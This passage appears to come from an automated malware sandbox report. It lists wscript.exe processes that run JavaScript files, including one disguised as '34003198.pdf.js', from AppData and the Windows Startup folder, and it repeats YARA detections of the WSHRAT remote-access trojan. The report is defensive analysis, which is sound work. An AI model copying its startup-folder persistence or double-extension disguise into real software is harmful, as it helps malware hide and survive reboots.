                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:9
                                                              Start time:15:28:12
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:15:28:16
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:15:28:22
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:15:28:22
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:15:28:24
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              No disassembly